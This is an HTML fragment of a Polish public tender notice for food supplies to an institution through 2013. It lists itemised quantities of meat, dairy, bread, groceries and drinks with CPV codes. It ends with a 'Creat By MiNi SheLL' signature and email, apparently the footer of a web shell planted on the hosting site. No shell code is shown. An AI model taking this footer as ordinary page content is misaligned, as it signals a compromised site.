marchew kostka 2,5 kg	szt	2
marchew kostka mroż	kg	100
marchew z groszkiem 2,5 kg	szt	2
marchew z groszkiem mroż	kg	25
mieszanka kompotowa	kg	5
pizza 250g	szt	90
pyzy z mięsem  	kg	80
pyzy z owocami (knedle)	kg	20
szpinak	kg	5
truskawki mrozone	kg	2
warzywa na patelnię	kg	10
warzywa na pat.chinskie	kg	5
zapiekanka 200g	szt	120
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie	6. jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	jaja	szt	2500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie	7. mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	25
golonka wieprz b/k	kg	15
golonka wiep z kością	kg	8
karkówka wieprz b/k	kg	90
karkówka wieprz z/k	kg	16
kości wieprzowe	kg	60
łopatka b/k	kg	300
łopatka z kością	kg	15
mięso gulaszowe	kg	20
polędwica wieprzowa (Mięso)	kg	5
schab wiep b/k	kg	40
schab wiep z/k	kg	11
słonina	kg	10
szynka wiep b/k	kg	45
wątroba wieprzowa	kg	21
wołowina zrazowa	kg	7
żeberka wiep	kg	28.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.90.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie	8. drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ćwiartki tylne drobiowe	kg	30
filet drobiowy	kg	15
filet z piersi kurczaka	kg	85
korpusy drobiowe(grzbiety)	kg	300
serca drobiowe	kg	10
wątroba drobiowa	kg	28
udka	kg	550
żołądki drobiowe	kg	14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.90.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie	9. wędliny i produkty wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	20
boczek wędzony gotowany	kg	10
boczek wędzony surowy	kg	10
boczek  rolada	kg	15
filet drobiowy- wędlina	kg	20
Kabanosy typu leśne lub równoważne	kg	20
kiełbasa biała parzona	kg	12
kiełbasa biała  surowa	kg	12
kiełbasa codzienna lub równowazna	kg	60
kiełbasa golonkowa	kg	30
kiełbasa śląska lub równowazna	kg	30
kiełbasa toruńska lub równowazna	kg	50
kiełbasa typu ogniskowa lub równoważna	kg	64
kiełbasa piwna	kg	45
kiełbasa szynkowa	kg	89
kiełbasa zwyczajna	kg	80
krakowska	kg	60
metka cebulowa	szt	120
metka łososiowa	kg	17
metka inna typu wiejska lub równowazna	kg	20
mielonka  wędlina	kg	30
mielonka z warzywami	kg	10
mielonka śniadaniowa lub równowazna	kg	40
mortadela	kg	5
ogonówka	kg	30
parówka hot-dog drobiowa	kg	11
parówka	kg	100
parówka	kg	12
pasztetowa  domowa lub równowazna	kg	20
pasztetowa  śmietankowa lub równowazna	kg	12
pasztet drobiowy	kg	16
Pieczeń śniadaniowa	kg	12
pierś z kurczaka wędlina	kg	20
polędwica drobiowa	kg	35
polędwica drobiowa lux	kg	20
polędwica sopocka drobiowalub równowazna	kg	20
polędwica indyk	kg	15
polędwica wieprz.(wędlina)	kg	5
przysmak w konserwie lub równowazny	kg	40
salami	kg	4
serdelki	kg	60
smaczek konserwowy lub równowazny	kg	30
smaczek konserwowy 0,5kg lub równowazna	szt	24
szynka drobiowa	kg	20
szynka mielona	kg	25
szynka konserwowa	kg	35
szynka tostowa	kg	25
Szynkowa	kg	12
szynka typu szynka żołnierska lub równowazna	kg	20
szynka z warzywami	kg	20
szynkówka kiełbasa	kg	30
tyrolska lub równowazna	kg	40
wędlina z warzywami	kg	30
żywiecka	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie	10. pasztety i konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> gulasz angielski 120g	szt	86
pasztet131 g koperek/majer./papryka/pieczar/pomid	szt	175
przysmak śniadaniowy 130g	szt	175
przysmak śniadaniowy 300g	szt	43
turystyczna  135g	szt	86
turystyczna 300g	szt	43
tyrolska 135g	szt	86
tyrolska 300g	szt	43.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie	11. ryby i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z mintaja	kg	40
filet z morszczuka	kg	10
matijas	kg	25
paluszki rybne	kg	40
panga	kg	45
paprykarz szczeciński 156g	szt	90
szprot w pomidorach 300g	szt	43
tunczyk w oleju 170 g	szt	43
śledź świeży filet	kg	25
śledź w pomidorach 170g	szt	43.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie	12. pieczywo i ciasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony pszenny 0,6 kg	szt	5100
ciastka drożdżowe 100g	szt	180
ciasta różne	kg	12
bułki pszenne100g	szt	360
bułki 50g	szt	550
bułki hamburger	szt	150
rogal 100g	szt	200
pączki 100g	szt	180
ciastka francuskie100g	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie	13. produkty skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	40
kasza jęczm. drobna	kg	5
kasza jęczm. Średnia	kg	50
kasza jęczm. Średnia 5kg	szt	3
kasza pęczak	kg	20
mąka pszenna typu 500	kg	60
mąka pszenna typu 450	kg	120
mąka ziemiaczna	kg	40
płatki owsiane 400g	kg	20
płatki kukurydz. 250G	szt	25
platki kukur. 500 g	szt	55
platki kuku.kakaowe 250g	szt	20
platki kukur.kuleczki  500g	szt	50
płatki	szt	20
ryż 4*100g	szt	24
ryż 1kg	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie	14 produkty spożywcze różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   	szt	43
baton 	szt	120
baton	szt	90
barszcz biały 42 g	szt	72
barszcz czerwony 220ml	szt	20
bialy barszcz	szt	50
budyń	szt	150
bułka tarta 500g	szt	60
chrupki kukurydziane	szt	43
ciastka w polewie	kg	12
ciastka kruche	kg	12
ciastka typy pierniki	kg	12
ciastka typu wafelki	kg	12
Ciastka-rolada  300g	szt	20
cukier	kg	400
cukier puder  400g	szt	10
cukier waniliowy	szt	60
cukierki czekoladowe	kg	12
cukierki typu krówki	kg	8
cukierki typu szklaki	kg	9
cukierki owocowe 1,3 kg	kg	5
cynamon 0,20g	szt	24
czekolada z orzechami	szt	40
czekolada nadziewana	szt	150
czekolada mleczna	szt	150
czipsy	szt	90
drożdże 100g	szt	30
galaretka owocowa	szt	70
gofry 500g	szt	120
herbata expres 100 szt	szt	20
herbata expres 40 szt	szt	40
herbata expr. Mietowa 25szt	szt	5
hebata expres owocowa 25szt	szt	10
herbata granulowana 100g	szt	15
herbata owoc.rozpusz gran.	szt	10
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	20
jarzynka 1kg	szt	10
Jarzynka 0,5 kg	szt	12
Kawa zboż-expr.	szt	20
kawa rozpuszczalna zboż	szt	20
kawa rozpusz. typu   lub równoważna	szt	2
kawa typy capucino  lub równoważna	szt	20
kawa typu premium 500g lub równoważna	szt	3
kakao typu puchatek 350g  lub równoważny	szt	80
keczup 500g	szt	50
keczup pikantny 0.5	szt	24
ketchup 700g	szt	12
Keczup 1 l	szt	10
kisiel  	szt	65
kminek 20g	szt	25
krem czekoladowy 200g	szt	250
krem czekoladowy 350g	szt	60
krem czekolad.typu 	szt	35
krem czek. 250g  lub równoważny	szt	40
kwasek cytrynowy	szt	150
kwasek cytrynowy 0,5kg	szt	2
liść laurowy 20g	szt	25
liść laurowy 500g	szt	10
lizak typu 	szt	43
lizak	szt	117
lizak typu serduszko	szt	120
magi w plynie 1 l	szt	5
mak -puszka 500g	szt	5
makaron nitki  0.5 kg	szt	60
makaron gniazda 1kg	szt	20
makar. gniaz. 400g  typu	szt	24
makaron łazanka  500g	szt	30
makaron rurki 1 kg	szt	10
makaron paczka 	szt	20
makaron świderki 0,5kg 	szt	20
makaron świderki 1kg	szt	30
makaron spagetti 0,5kg	szt	30
makaron zacierka 250g	szt	72
majeranek 20g	szt	40
majeranek 150g	szt	8
majeranek 500g	szt	4
majonez  350g do sałatek	szt	24
mojonez 620g do sałatek	szt	12
majonez   700g  do sałatek	szt	35
majonez 900g  do sałatek	szt	32
majonez 3kg  do sałatek	szt	6
majonez 5kg  do sałatek	szt	2
mikołaj czekoladowy	szt	43
miód sztuczny 200g	szt	48
miód sztuczny  5kg	szt	1
Miód naturalny 400G	szt	8
musztarda  190g	szt	36
musztrda tuba 0.5 l	szt	10
musztarda 1l	szt	8
Ocet 10%	szt	48
paluszki solone	szt	43
paluszki -cebulowe,kminkowe, paprykowe itp.	szt	121
paluszki z sezamem	szt	43
papryka mielona 20g	szt	50
papryka mielona 1kg	szt	2
pieprz mielony 20g	szt	100
pieprz mielony 1000g	szt	4
pieprz w ziarnkach 20g	szt	25
pieprz w ziarnkach 1kg	szt	2
pieprz ziolowy 20g	szt	25
pieprz ziolowy 1 kg	szt	2
polewa do lodów 1 l	szt	5
polewa do lodów 200g	szt	8
proszek do pieczenia 0,30 g	szt	60
przyprawa gyros 20g	szt	40
przyprawa gyros 0,700g	szt	2
przyprawa do bigosu 0,3	szt	25
przyprawa do grilla 20g	szt	50
przyprawa do grilla 1kg	szt	2
przyprawa do kurczaka 1 kg	szt	2
przyprawa do kurczaka 20g	szt	50
przyprawa do ryb 20g	szt	40
przyprawa do ryb 600g	szt	2
puure ziemn. z boczkiem  35g	szt	40
rosół drobiowy słoik	szt	16
rosól drobiowy 1 kg	szt	15
rosół drobiowy kost.typu knor 60g	szt	20
soda spożywcza 80g	szt	25
sos typy bolones 500ml	szt	16
sos chili 1l	szt	3
sos czosnkowy 1 l	szt	8
sos czosnkowy 250ml	szt	22
sos do deserów 1 l	szt	10
sos do hamburgerow 880g	szt	10
sos do spagetti słoik  500g	szt	30
sos mix koper-zioł, włoski itp.	opk	5
sos salatkowy mix 700g	szt	8
sos słodko-kwaśny  500g	szt	48
sos sojowy 1l	szt	5
sól	kg	180
sól peklowa	szt	10
wafelek duży(wafel z kremem typu murzynek)	szt	90
wafelek mały(wafel z kremem typu murzynek)	szt	90
wafelek w polewie	szt	45
wafelek b/polewy typu grzesiek	szt	90
warzywko 200g	szt	30
warzywko 500g	szt	10
Warzywko 1 kg	szt	10
wiórki kokosowe 0,25	szt	10
Zasmazka 1 kg	szt	3
zestaw świateczny (np.czelolada, baton, mikołaj)	szt	43
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	43
ziele angielskie	szt	25
ziele angielskie 600g	szt	2
zupki typu chińska(ostra,łagodna rosołowa itp.)	szt	320
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	45
zupki typu chińska(pomidorowa, barszcz,itp)	szt	90
zelatyna 50g	szt	25
Żelatyna 1 kg	szt	2
żurek w butelce 0,5l	szt	30
zurek w proszku	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie	15 oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem	szt	500
Margaryna  0,5 kg	szt	120
masło roślinne 200g	szt	15
oliwa z oliwek 1 l	szt	2
olej 1l	szt	135
olej 3l	szt	20
olej 5l	szt	5
smalec	kg	3
smalec 200g	szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie	16 produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser mleczny/owocowy  125-150g	kg	11
deser typu monte  lub równoważny	opk	40
jogurt pitny 150-200g	l	32
jogurt  ze zbożami musli 200-250g	kg	30
jogurt typu gratka  lub równoważny 125 g	szt	640
jogurt typu jogutek  lub równoważny 125g	szt	160
Kefir 0,2-0,4l	l	40
masło  200G	szt	400
maślanka owocowa .,0,3-0,45 l	litr	90
Mleko UHT 2% 1l	szt	120
Mleko UHT 3,2% 1l	szt	250
serek grani 0,180-0,2	kg	16
serek homogenizowany 125-150g	kg	16
serek kanapk. Twarożk. 125-220G	kg	20
serek twaroż. Typu almette lub równoważny	szt	20
ser twarogowy 200-250g	kg	8
ser twarogowy półtusty	kg	10
set topiony kostka100g	szt	80
ser topiony -kiełbaski 100g	szt	120
ser top. Zegar200g	szt	30
ser topiony zegar 140-160g	kg	32
ser wędzony	kg	15
ser  bałtycki	kg	20
ser edamski	kg	25
ser gouda	kg	25
ser kaszub	kg	10
ser królewski	kg	10
ser morski	kg	15
ser tyżycki	kg	15
ser salami	kg	10
Smietana 18% 0,5l	l	12
Śmietanka 18% 0,2-0,5 l	l	24
Śmietanka 18% 1l	l	24
Śmietanka 30% 0,2- 0,5 l	szt	24
Smietanka 30% 1l	szt	20
Śmietana 18% 0,5 l	szt	24
Śmietana 18% 1l	szt	30
Śmietana 30%  0,5 l	szt	24
Smietana 30% 1l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie	17 napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	24
napoje niegazowane 1,5 l	szt	24
napój gazowany 2l	szt	8
napój n/g 2 l	szt	8
napój energet	szt	90
Woda mineralna 0,5 gaz	szt	90
Woda 0,5 n/g	szt	90
woda mineralna n/g 1,5 l	szt	24
woda mineralna g 1,5 l	szt	24
Woda miner n/g 1,5 l typu 	szt	6
woda g 1,5 l typu 	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com